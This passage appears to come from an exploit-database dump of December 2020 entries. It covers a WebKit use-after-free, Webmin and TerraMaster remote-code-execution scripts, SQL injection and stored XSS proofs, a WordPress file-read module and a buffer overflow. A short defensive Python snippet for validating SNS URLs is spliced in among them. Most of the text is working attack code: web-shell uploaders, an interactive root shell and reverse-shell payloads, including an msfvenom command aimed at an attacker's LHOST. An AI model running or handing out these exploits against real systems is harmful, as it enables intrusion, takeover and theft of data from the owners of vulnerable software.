       /* Checking for leaked data */
       if (findTargetObj() === false)
         die("[!] Failed to reuse target obj.");
       dumpTargetObj();
       g_fake_validation_message[4] = g_timer_leak.add(LENGTH_TIMER * 8 + OFFSET_LENGTH_STRINGIMPL + 1 - OFFSET_ELEMENT_REFCOUNT).asDouble();
       /*
        * The timeout must be > 5s because deleteBubbleTree is scheduled to run in
        * the next 5s
        */
       setTimeout(leakJSC, 6000);
     }

     function handle2() {
       /* focus elsewhere */
       input2.focus();
     }

     function reuseTargetObj() {
       /* Delete ValidationMessage instance */
       document.body.appendChild(g_input);
       /*
        * Free ValidationMessage neighboors.
        * SmallLine is freed -> SmallPage is cached
        */
       for (let i = NB_FRAMES / 2 - 0x10; i < NB_FRAMES / 2 + 0x10; i++)
         g_frames[i].setAttribute("rows", ',');
       /* Get back target object */
       for (let i = 0; i < NB_REUSE; i++) {
         let ab = new ArrayBuffer(LENGTH_VALIDATION_MESSAGE);
         let view = new Float64Array(ab);
         view[0] = guess_htmltextarea_addr.asDouble(); // m_element
         view[3] = guess_htmltextarea_addr.asDouble(); // m_bubble
         g_arr_ab_1.push(view);
       }
       if (g_round == 1) {
         /*
          * Spray a couple of StringImpl obj. prior to Timer allocation
          * This will force Timer allocation on same SmallPage as our Strings
          */
         sprayStringImpl(0, SPRAY_STRINGIMPL);
         g_frames = [];
         g_round += 1;
         g_input = input3;
         setTimeout(confuseTargetObjRound1, 10);
       } else {
         setTimeout(confuseTargetObjRound2, 10);
       }
     }

     function dumpTargetObj() {
       debug_log("[+] m_timer: " + g_timer_leak);
       debug_log("[+] m_messageHeading: " + g_message_heading_leak);
       debug_log("[+] m_messageBody: " + g_message_body_leak);
     }

     function findTargetObj() {
       for (let i = 0; i < g_arr_ab_1.length; i++) {
         if (!Int64.fromDouble(g_arr_ab_1[i][2]).equals(Int64.Zero)) {
           debug_log("[+] Found fake ValidationMessage");
           if (g_round === 2) {
             g_timer_leak = Int64.fromDouble(g_arr_ab_1[i][2]);
             g_message_heading_leak = Int64.fromDouble(g_arr_ab_1[i][4]);
             g_message_body_leak = Int64.fromDouble(g_arr_ab_1[i][5]);
             g_round++;
           }
           g_fake_validation_message = g_arr_ab_1[i];
           g_arr_ab_1 = [];
           return true;
         }
       }
       return false;
     }

     function prepareUAF() {
       g_input.setCustomValidity("ps4");
       for (let i = 0; i < NB_FRAMES; i++) {
         var element = document.createElement("frameset");
         g_frames.push(element);
       }
       g_input.reportValidity();
       var div = document.createElement("div");
       document.body.appendChild(div);
       div.appendChild(g_input);
       /* First half spray */
       for (let i = 0; i < NB_FRAMES / 2; i++)
         g_frames[i].setAttribute("rows", g_rows1);
       /* Instantiate target obj */
       g_input.reportValidity();
       /* ... and the second half */
       for (let i = NB_FRAMES / 2; i < NB_FRAMES; i++)
         g_frames[i].setAttribute("rows", g_rows2);
       g_input.setAttribute("onfocus", "reuseTargetObj()");
       g_input.autofocus = true;
     }

     /* HTMLElement spray */
     function sprayHTMLTextArea() {
       debug_log("[+] Spraying HTMLTextareaElement ...");
       let textarea_div_elem = document.createElement("div");
       document.body.appendChild(textarea_div_elem);
       textarea_div_elem.id = "div1";
       var element = document.createElement("textarea");
       /* Add a style to avoid textarea display */
       element.style.cssText = 'display:block-inline;height:1px;width:1px;visibility:hidden;';
       /*
        * This spray is not perfect, "element.cloneNode" will trigger a fastMalloc
        * allocation of the node attributes and an IsoHeap allocation of the
        * Element. The virtual page layout will look something like that:
        * [IsoHeap] [fastMalloc] [IsoHeap] [fastMalloc] [IsoHeap] [...]
        */
       for (let i = 0; i < SPRAY_ELEM_SIZE; i++)
         textarea_div_elem.appendChild(element.cloneNode());
     }

     /* StringImpl Spray */
     function sprayStringImpl(start, end) {
       for (let i = start; i < end; i++) {
         let s = new String("A".repeat(LENGTH_TIMER - LENGTH_STRINGIMPL - 5) + i.toString().padStart(5, "0"));
         g_obj_str[s] = 0x1337;
       }
     }

     function go() {
       /* Init spray */
       sprayHTMLTextArea();
       g_input = input1;
       /* Shape heap layout for obj. reuse */
       prepareUAF();
     }
  8. # Exploit Title: Victor CMS 1.0 - File Upload To RCE
     # Date: 20.12.2020
     # Exploit Author: Mosaaed
     # Vendor Homepage: https://github.com/VictorAlagwu/CMSsite
     # Software Link: https://github.com/VictorAlagwu/CMSsite/archive/master.zip
     # Version: 1.0
     # Tested on: Apache2/Linux

     Step 1: register at http://localhost/CMSsite-master/register.php
     Step 2: login as user
     Step 3: go to Profile
     Step 4: upload an image as a php file (upload shell.php)
     Step 5: update user
     Step 6: you will find your shell in the img folder: /path/img/cmd.php

     http://localhost/CMSsite-master/img/cmd.php?cmd=id
     uid=33(www-data) gid=33(www-data) groups=33(www-data)
  9. # Exploit Title: Library Management System 3.0 - "Add Category" Stored XSS
     # Exploit Author: Kislay Kumar
     # Date: 2020-12-22
     # Google Dork: N/A
     # Vendor Homepage: https://otsglobal.org/
     # Software Link: https://codecanyon.net/item/library-management-system-22/16965307
     # Affected Version: 3.0
     # Patched Version: Unpatched
     # Category: Web Application
     # Tested on: Kali Linux

     Step 1. Login as Admin.
     Step 2. Select "Book" from the menu, select "Categories" from the sub menu and then click on "Add Category".
     Step 3. Insert the payload "><img src onerror=alert(1)> in "Category Name".
     Step 4. Now click on "Save", go to "Category" and see the last entry; there you will get an alert box.
  10. # Exploit Title: Pandora FMS 7.0 NG 750 - 'Network Scan' SQL Injection (Authenticated)
# Date: 12-21-2020
# Exploit Author: Matthew Aberegg, Alex Prieto
# Vendor Homepage: https://pandorafms.com/
# Patch Link: https://github.com/pandorafms/pandorafms/commit/d08e60f13a858fbd22ce6b83fa8ca391c608ec5c
# Software Link: https://pandorafms.com/community/get-started/
# Version: Pandora FMS 7.0 NG 750
# Tested on: Ubuntu 18.04

# Vulnerability Details
# Description : A blind SQL injection vulnerability exists in the "Network Scan" functionality of Pandora FMS.
# Vulnerable Parameter : network_csv

# POC

POST /pandora_console/index.php?sec=gservers&sec2=godmode/servers/discovery&wiz=hd&mode=netscan&page=1 HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------308827614039434535382911921119
Content-Length: 1597
Origin: http://TARGET
Connection: close
Referer: http://TARGET/pandora_console/index.php?sec=gservers&sec2=godmode/servers/discovery&wiz=hd&mode=netscan
Cookie: PHPSESSID=i5uv0ugb4bdu9avagk38vcdok3
Upgrade-Insecure-Requests: 1

-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="interval_manual_defined"

1
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="interval_select"

300
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="interval_text"

0
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="interval"

0
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="interval_units"

1
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="taskname"

test
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="id_recon_server"

3
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="network_csv_enabled"

on
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="network_csv"; filename="test.txt"
Content-Type: text/plain

' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- a
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="network"


-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="comment"

test
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="submit"

Next
-----------------------------308827614039434535382911921119--
  11. # Exploit Title : CSE Bookstore 1.0 - Multiple SQL Injection
# Date : 2020-12-21
# Author : Musyoka Ian
# Version : CSE Bookstore 1.0
# Vendor Homepage: https://projectworlds.in/
# Platform : PHP
# Tested on : Debian

CSE Bookstore version 1.0 is vulnerable to time-based blind, boolean-based blind and OR error-based SQL injection in the pubid parameter in bookPerPub.php. A successful exploitation of this vulnerability will lead to an attacker dumping the entire database the web application is running on.

Below are the results returned by SQLMap:

Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payload: http://192.168.196.83:80/ebook/bookPerPub.php?pubid=' OR NOT 4138=4138#

Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: http://192.168.196.83:80/ebook/bookPerPub.php?pubid=' OR (SELECT 7393 FROM(SELECT COUNT(*),CONCAT(0x71717a7071,(SELECT (ELT(7393=7393,1))),0x7178716a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- nkDF

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://192.168.196.83:80/ebook/bookPerPub.php?pubid=' AND (SELECT 6293 FROM (SELECT(SLEEP(5)))eqTh)-- CJmT

POC 1

REQUEST
========
GET /ebook/bookPerPub.php?pubid=4' HTTP/1.1
Host: 192.168.196.83
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: PHPSESSID=c4qd3glr3oe6earuf88sub6g1n
Upgrade-Insecure-Requests: 1

RESPONSE
========
HTTP/1.1 200 OK
Date: Mon, 21 Dec 2020 20:09:49 GMT
Server: Apache/2.4.38 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 172
Connection: close
Content-Type: text/html; charset=UTF-8

Can't retrieve data You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''4''' at line 1

POC 2

Also, the web application is vulnerable to SQL injection in the cart.php file by sending an SQL injection payload in the bookisbn POST data parameter.

REQUEST
=======
POST /ebook/cart.php HTTP/1.1
Host: 192.168.196.83
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Connection: close
Cache-Control: max-age=0
Referer: http://192.168.196.83/ebook/book.php?bookisbn=978-1-1180-2669-4
Content-Type: application/x-www-form-urlencoded
Content-Length: 57
Cookie: PHPSESSID=igasmmkkf2thcc877pmjui05t9

bookisbn=978-1-1180-2669-4'&cart=Purchase+%2f+Add+to+cart

RESPONSE
=======
get book price failed! You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''978-1-1180-2669-4''' at line 1

POC 3

Lastly, the bookisbn parameter on book.php is vulnerable to SQL injection, which also has a high severity since it could lead to dumping of database credentials.

REQUEST
=======
GET /ebook/book.php?bookisbn=978-0-7303-1484-4' HTTP/1.1
Host: 192.168.196.83
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Connection: close
Cache-Control: max-age=0
Referer: http://192.168.196.83/ebook/books.php
Cookie: PHPSESSID=bvmt3vp30gjnr724helh37v2on

RESPONSE
========
HTTP/1.1 200 OK
Date: Mon, 21 Dec 2020 20:47:58 GMT
Server: Apache/2.4.38 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 188
Connection: close
Content-Type: text/html; charset=UTF-8

Can't retrieve data You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''978-0-7303-1484-4''' at line 1
  12. # Exploit Title: Multi Branch School Management System 3.5 - "Create Branch" Stored XSS
# Exploit Author: Kislay Kumar
# Date: 2020-12-21
# Google Dork: N/A
# Vendor Homepage: https://www.ramomcoder.com/
# Software Link: https://codecanyon.net/item/ramom-multi-branch-school-management-system/25182324
# Affected Version: 3.5
# Category: Web Application
# Tested on: Kali Linux

Step 1. Login as Super Admin.
Step 2. Select "Branch" from the menu and after that click on "Create Branch".
Step 3. Insert payload - "><img src onerror=alert(1)> in "Branch Name", "School Name", "Mobile No.", "Currency", "Symbol", "City" and "State".
Step 4. Now click on "Save" and you will get a list of alert boxes.
  13. ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Webmin 1.962 - Package Update Escape Bypass RCE (Metasploit)',
      'Description'    => %q(
        This module exploits an arbitrary command execution vulnerability in Webmin
        1.962 and lower versions. Any user authorized to the "Package Updates" module
        can execute arbitrary commands with root privileges. It emerged by circumventing
        the measure taken for CVE-2019-12840. s/\\(-)|\\(.)/string/g; escape is not enough
        for prevention. Therefore, since the package name variable is placed directly in
        the system command, we can manipulate it using some escape characters that HTTP
        supports. For example, we can escape control by dropping the command line down
        one line. We can do this with "%0A" and "%0C" urlencoded row values. Also, for the
        payload to work correctly, we must add a double ampersand (&&) to the end of the
        payload (%26%26)
      ),
      'Author'         =>
        [
          'AkkuS <Özkan Mustafa Akkuş>' # Vulnerability Discovery, MSF PoC module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', 'CVE-2020-35606'],
          ['URL', 'https://www.pentest.com.tr/exploits/Webmin-1962-PU-Escape-Bypass-Remote-Command-Execution.html']
        ],
      'Privileged'     => true,
      'Payload'        =>
        {
          'DisableNops' => true,
          'Space'       => 512,
          'Compat'      =>
            {
              'PayloadType' => 'cmd'
            }
        },
      'DefaultOptions' =>
        {
          'RPORT'   => 10000,
          'SSL'     => false,
          'PAYLOAD' => 'cmd/unix/reverse_perl'
        },
      'Platform'       => 'unix',
      'Arch'           => ARCH_CMD,
      'Targets'        => [['Webmin <= 1.962', {}]],
      'DisclosureDate' => '2020-12-21',
      'DefaultTarget'  => 0)
    )

    register_options [
      OptString.new('USERNAME', [true, 'Webmin Username']),
      OptString.new('PASSWORD', [true, 'Webmin Password']),
      OptString.new('TARGETURI', [true, 'Base path for Webmin application', '/'])
    ]
  end

  def peer
    "#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}"
  end

  def login
    res = send_request_cgi({
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri, 'session_login.cgi'),
      'cookie'    => 'testing=1', # it must be used for "Error - No cookies"
      'vars_post' => {
        'page' => '',
        'user' => datastore['USERNAME'],
        'pass' => datastore['PASSWORD']
      }
    })

    if res && res.code == 302 && res.get_cookies =~ /sid=(\w+)/
      return $1
    end

    return nil unless res
    ''
  end

  def check
    cookie = login
    return CheckCode::Detected if cookie == ''
    return CheckCode::Unknown if cookie.nil?

    vprint_status('Attempting to execute...')
    # check version
    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      => normalize_uri(target_uri.path, "sysinfo.cgi"),
      'cookie'   => "sid=#{cookie}",
      'vars_get' => { "xnavigation" => "1" }
    })

    if res && res.code == 302 && res.body
      version = res.body.split("Webmin 1.")[1]
      return CheckCode::Detected if version.nil?
      version = version.split(" ")[0]
      if version <= "962"
        # check package update priv
        res = send_request_cgi({
          'uri'    => normalize_uri(target_uri.path, "package-updates/"),
          'cookie' => "sid=#{cookie}"
        })
        if res && res.code == 200 && res.body =~ /Software Package Update/
          print_status("NICE! #{datastore['USERNAME']} has the right to >>Package Update<<")
          return CheckCode::Vulnerable
        end
      end
    end

    print_error("#{datastore['USERNAME']} doesn't have the right to >>Package Update<<")
    print_status("Please try with another user account!")
    CheckCode::Safe
  end

  def exploit
    cookie = login
    if cookie == '' || cookie.nil?
      fail_with(Failure::Unknown, 'Failed to retrieve session cookie')
    end
    print_good("Session cookie: #{cookie}")

    res = send_request_cgi(
      'method'  => 'POST',
      'uri'     => normalize_uri(target_uri, 'proc', 'index_tree.cgi'),
      'headers' => { 'Referer' => "#{peer}/sysinfo.cgi?xnavigation=1" },
      'cookie'  => "sid=#{cookie}"
    )

    unless res && res.code == 200
      fail_with(Failure::Unknown, 'Request failed')
    end

    print_status("Attempting to execute the payload...")
    run_update(cookie)
  end

  def run_update(cookie)
    @b64p = Rex::Text.encode_base64(payload.encoded)
    perl_payload = 'bash -c "{echo,' + "#{@b64p}" + '}|{base64,-d}|{bash,-i}"'
    payload = Rex::Text.uri_encode(perl_payload)

    res = send_request_cgi({
      'method'  => 'POST',
      'cookie'  => "sid=#{cookie}",
      'ctype'   => 'application/x-www-form-urlencoded',
      'uri'     => normalize_uri(target_uri.path, 'package-updates', 'update.cgi'),
      'headers' => { 'Referer' => "#{peer}/package-updates/?xnavigation=1" },
      # new vector // bypass to backslash %0A%7C{}%26%26
      'data'    => "redir=%2E%2E%2Fsquid%2F&redirdesc=Squid%20Proxy%20Server&mode=new&u=squid34%0A%7C#{payload}%26%26"
      # for CVE-2019-12840
      #'data'   => "u=acl%2Fapt&u=%20%7C%20#{payload}&ok_top=Update+Selected+Packages"
    })
  end
end
  14. ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
#
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Report
  include Msf::Exploit::Remote::HTTP::Wordpress
  include Msf::Auxiliary::Scanner

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'WordPress W3 Total Cache File Read Vulnerability',
        'Description' => %q{
          This module exploits an unauthenticated directory traversal vulnerability
          in WordPress plugin 'W3 Total Cache' version 0.9.2.6-0.9.3, allowing
          arbitrary file read with the web server privileges.
        },
        'References' => [
          ['CVE', '2019-6715'],
          ['WPVDB', '9248'],
          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2019-6715'],
          ['URL', 'https://vinhjaxt.github.io/2019/03/cve-2019-6715'],
        ],
        'Author' => [
          'VinhJAXT', # Vulnerability discovery
          'Hoa Nguyen - SunCSR Team' # Metasploit module
        ],
        'DisclosureDate' => '2014-09-20',
        'License' => MSF_LICENSE
      )
    )

    register_options(
      [
        OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']),
        OptInt.new('DEPTH', [true, 'Traversal Depth (to reach the root folder)', 2])
      ]
    )
  end

  def check
    check_plugin_version_from_readme('w3-total-cache', '0.9.4', '0.9.26')
  end

  def run_host(ip)
    traversal = '../' * datastore['DEPTH']
    filename = datastore['FILEPATH']
    filename = filename[1, filename.length] if filename =~ %r{^/}

    # The file to read is the FILEPATH option, appended to the traversal prefix.
    json_body = {
      'Type' => "SubscriptionConfirmation",
      'Message' => '',
      'SubscribeURL' => "file:///#{traversal}#{filename}"
    }

    res = send_request_cgi({
      'method' => 'PUT',
      'uri' => normalize_uri(wordpress_url_plugins, 'w3-total-cache', 'pub', 'sns.php'),
      'ctype' => 'application/json',
      'data' => JSON.generate(json_body)
    })

    fail_with Failure::Unreachable, 'Connection failed' unless res
    fail_with Failure::NotVulnerable, 'Connection failed. Nothing was downloaded' unless res.code == 200
    fail_with Failure::NotVulnerable, 'Nothing was downloaded. Change the DEPTH parameter' if res.body.length.zero?

    print_status('Downloading file...')
    print_line("\n#{res.body}\n")

    fname = datastore['FILEPATH']

    path = store_loot(
      'w3_total_cache.traversal',
      'text/plain',
      ip,
      res.body,
      fname
    )

    print_good("File saved in: #{path}")
  end
end
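The module above works because the plugin's SNS endpoint fetches whatever `SubscribeURL` the unauthenticated JSON body supplies, including a `file:///` URL. What a receiver of Amazon SNS messages should do before following that link, as an added example (not code from W3 Total Cache or from the module's authors): allow only `https` and only an SNS service hostname, and refuse userinfo tricks. The hostname pattern `sns.<region>.amazonaws.com` is an assumption of this example covering the commercial regions; adjust it for other partitions.

```python
import re
from urllib.parse import urlsplit

# Assumed allowlist for this example: genuine SNS confirmations arrive over HTTPS
# from an sns.<region>.amazonaws.com endpoint (commercial regions only).
SNS_HOST_RE = re.compile(r"^sns\.[a-z0-9-]+\.amazonaws\.com$")


def is_safe_subscribe_url(url: str) -> bool:
    """True only for an https URL whose host is an SNS service endpoint."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return False
    if parts.scheme.lower() != "https":
        return False  # file://, http://, gopher:// and friends are all refused
    if parts.username is not None or parts.password is not None:
        return False  # https://sns.x.amazonaws.com@evil.example/ would parse as evil.example
    host = (parts.hostname or "").lower()
    return bool(SNS_HOST_RE.match(host))


def handle_sns_message(message: dict) -> str:
    """Decide what the endpoint would do with a parsed SNS JSON message.

    Returns an outcome string instead of performing any network fetch, so the
    policy can be exercised offline.
    """
    if message.get("Type") != "SubscriptionConfirmation":
        return "ignored: not a subscription confirmation"
    url = message.get("SubscribeURL", "")
    if not is_safe_subscribe_url(url):
        return "refused: SubscribeURL failed validation"
    return "would confirm via " + url


if __name__ == "__main__":
    # Constructed messages: the traversal body from the module, and a genuine-looking one.
    print(handle_sns_message({"Type": "SubscriptionConfirmation", "Message": "",
                              "SubscribeURL": "file:///../../etc/passwd"}))
    print(handle_sns_message({"Type": "SubscriptionConfirmation", "Message": "",
                              "SubscribeURL": "https://sns.us-east-1.amazonaws.com/?Action=ConfirmSubscription&Token=t"}))
```

Validating the URL is necessary but not sufficient on its own: the response body fetched from the confirmation URL should never be echoed back to the caller, which is the second half of why the original bug became an arbitrary file read.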
  15. # Exploit Title: Artworks Gallery Management System 1.0 - 'id' SQL Injection
# Exploit Author: Vijay Sachdeva
# Date: 2020-12-22
# Vendor Homepage: https://www.sourcecodester.com/php/14634/artworks-gallery-management-system-php-full-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14634&title=Artworks+Gallery+Management+System+in+PHP+with+Full+Source+Code
# Affected Version: Version 1
# Tested on Kali Linux

Step 1. Log in to the application with admin credentials.
Step 2. Click on "Explore" and then select "Artworks".
Step 3. Choose any item; the URL should be "http://localhost/art-bay/info_art.php?id=6"
Step 4. Run sqlmap on the URL where the "id" parameter is given

sqlmap -u "http://192.168.1.240/art-bay/info_art.php?id=8" --banner

---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=8 AND 4531=4531

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=8 AND (SELECT 7972 FROM (SELECT(SLEEP(5)))wPdG)

    Type: UNION query
    Title: Generic UNION query (NULL) - 9 columns
    Payload: id=8 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b627171,0x63435455546f41476e584f4a66614e445968714d427647756f6f48796153686e756f66715875466c,0x716a6b6b71)-- -
---
[08:18:34] [INFO] the back-end DBMS is MySQL
[08:18:34] [INFO] fetching banner
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
banner: '10.3.24-MariaDB-2'
---

Step 5. Sqlmap should inject the web-app successfully, which leads to information disclosure.
  16. # Exploit Title: TerraMaster TOS 4.2.06 - RCE (Unauthenticated)
# Date: 12/12/2020
# Exploit Author: IHTeam
# Full Write-up: https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/
# Vendor Homepage: https://www.terra-master.com/
# Version: <= 4.2.06
# Tested on: 4.1.30, 4.2.06

#!/usr/bin/env python3
import argparse
import requests
import time
import sys
import urllib.parse
from requests.packages.urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

parser = argparse.ArgumentParser(description="TerraMaster TOS <= 4.2.06 Unauth RCE")
parser.add_argument('--url', action='store', dest='url', required=True, help="Full URL and port e.g.: http://192.168.1.111:8081/")
args = parser.parse_args()
url = args.url
headers = {'User-agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36'}
epoch_time = int(time.time())
shell_filename = "debug"+str(epoch_time)+".php"

def check_endpoint(url, headers):
    response = requests.get(url+'/version', headers=headers, verify=False)
    if response.status_code == 200:
        print("[+] TerraMaster TOS version: ", str(response.content))
    else:
        print("\n[-] TerraMaster TOS response code: ", response.status_code)
        sys.exit()

def upload_shell(url, headers, shell_filename):
    payload = "http|echo \"<?php echo(passthru(\\$_GET['cmd']));?>\" >> /usr/www/"+shell_filename+" && chmod +x /usr/www/"+shell_filename+"||"
    payload = urllib.parse.quote(payload, safe='')
    print("[/] Uploading shell...")
    response = requests.get(url+'/include/makecvs.php?Event='+payload, headers=headers, verify=False)
    time.sleep(1)
    response = requests.get(url+'/'+shell_filename+'?cmd=id', headers=headers, verify=False)
    if ('uid=0(root) gid=0(root)' in str(response.content, 'utf-8')):
        print("[+] Upload succeeded")
    else:
        print("\n[-] Error uploading shell: ", response.content)
        sys.exit()

def interactive_shell(url, headers, shell_filename, cmd):
    response = requests.get(url+'/'+shell_filename+'?cmd='+urllib.parse.quote(cmd, safe=''), headers=headers, verify=False)
    print(str(response.text)+"\n")

def delete_shell(url, headers, shell_filename):
    delcmd = "rm /usr/www/"+shell_filename
    response = requests.get(url+'/'+shell_filename+'?cmd='+urllib.parse.quote(delcmd, safe=''), headers=headers, verify=False)
    print("\n[+] Shell deleted")

check_endpoint(url, headers)
upload_shell(url, headers, shell_filename)
try:
    while True:
        cmd = input("# ")
        interactive_shell(url, headers, shell_filename, cmd)
except:
    delete_shell(url, headers, shell_filename)
  17. # Exploit Title: Faculty Evaluation System 1.0 - Stored XSS
# Exploit Author: Vijay Sachdeva (pwnshell)
# Date: 2020-12-22
# Vendor Homepage: https://www.sourcecodester.com/php/14635/faculty-evaluation-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14635&title=Faculty+Evaluation+System+using+PHP%2FMySQLi+with+Source+Code
# Tested on Kali Linux

Step 1: Log in to the application with admin credentials.
Step 2: Click on Questionnaires, then click "Action" for any Academic Year and then click Manage.
Step 3: Input "<script>alert("pwnshell")</script>" in the "Question" field of the Question form.
Step 4: Click on "Save" when done and this will trigger the Stored XSS payloads. Whenever you click on Questionnaires, click Action for any academic year, and then Manage, your XSS payloads will be triggered for that "Academic Year".
  18. # Exploit Title: Class Scheduling System 1.0 - Multiple Stored XSS
# Exploit Author: Aakash Madaan (Godsky)
# Date: 2020-12-22
# Vendor Homepage: https://www.sourcecodester.com/php/5175/class-scheduling-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=5175&title=Class+Scheduling+System+using+PHP%2FMySQLi+with+Source+Code
# Affected Version: Version 1
# Category: Web Application
# Tested on: Parrot OS

[+] Step 1. Login to the application with admin credentials

[+] Step 2.1(a). Click on "Department" page. {Uri : http(s)://<host>/admin/department.php}
    Step 2.1(b). In the "Person Incharge" field, use XSS payload '"><script>alert("Department")</script>' as the name of the new entry and click on save.
    [ Note : The XSS can also be triggered if we put the same payload in the "Title" field ]
    Step 2.1(c). Click on "Save" when done and this will trigger the Stored XSS payloads. Whenever you click on "Department", your XSS payloads will be triggered.

[+] Step 2.2(a). Click on "Subject" page. {Uri : http(s)://<host>/admin/subject.php}
    Step 2.2(b). In the "Subject Code" field, use XSS payload '"><script>alert("Subject")</script>' as the name of the new entry and click on save.
    [ Note : The XSS can also be triggered if we put the same payload in the "Title" field ]
    Step 2.2(c). Click on "Save" when done and this will trigger the Stored XSS payloads. Whenever you click on "Subject", your XSS payloads will be triggered.

[+] Step 2.3(a). Click on "Course" page. {Uri : http(s)://<host>/admin/course.php}
    Step 2.3(b). In the "Course Year" field, use XSS payload '"><script>alert("Course")</script>' as the name of the new course and click on save.
    [ Note : The XSS can also be triggered if we put the same payload in the "Major" field ]
    Step 2.3(c). Click on "Save" when done and this will trigger the Stored XSS payloads. Whenever you click on "Course", your XSS payloads will be triggered.

[+] Step 2.4(a). Click on "Record" page. {Uri : http(s)://<host>/admin/record.php}
    Step 2.4(b). In the "Name" field, use XSS payload '"><script>alert("Record")</script>' as the name of the new entry and click on save.
    [ Note : The XSS can also be triggered if we put the same payload in the "Academic Rank" or "Designation" field ]
    Step 2.4(c). Click on "Save" when done and this will trigger the Stored XSS payloads. Whenever you click on "Record", your XSS payloads will be triggered.

[+] Step 3. This should trigger the XSS payload, and any time you click on the respective pages, your stored XSS payload will be triggered.
  19. # Exploit Title: 10-Strike Network Inventory Explorer Pro 9.05 - Buffer Overflow (SEH)
# Date: 2020-12-22
# Exploit Author: Florian Gassner
# Vendor Homepage: https://www.10-strike.com/
# Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-pro-setup.exe
# Version: 9.05
# Tested on: Windows 10 x64
# Computer -> From Text File -> Choose exploit.txt

import struct

"""
Message= - Pattern h1Ah (0x68413168) found in cyclic pattern at position 214
"""
OFFSET = 214

"""
badchars = '\x00\x09\x0a\x0d\x3a\x5c'
"""

"""
Log data, item 23
Address=01015AF4
Message= 0x01015af4 : pop ecx # pop ebp # ret 0x04 | {PAGE_EXECUTE_READWRITE} [NetworkInventoryExplorer.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files (x86)\10-Strike Network Inventory Explorer Pro\NetworkInventoryExplorer.exe
"""
pop_pop_ret = struct.pack("<I", 0x01015af4)
short_jump = '\xEB\x06\x90\x90'

"""
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.19.129 LPORT=443 -f python -v shellcode -b "\x00\x09\x0a\x0d\x3a\x5c" EXITFUNC=thread
"""
